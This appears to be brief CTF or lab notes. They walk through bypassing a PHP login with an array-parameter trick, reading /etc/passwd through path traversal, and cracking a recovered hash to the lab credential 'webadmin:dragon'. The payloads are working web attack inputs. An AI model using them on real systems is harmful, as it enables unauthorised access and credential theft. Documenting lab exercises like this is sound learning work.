Last updated 10 months ago
After being given the index.php source code I looked up anything that could be wrong with it (I'm not a php expert)
Stumbles across which looks exactly like the situation I'm in
username=admin&password[]=''
Intercepted the request and bypassed authentication
file=../../../../../../../../../etc/passwd
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/
webadmin:dragon
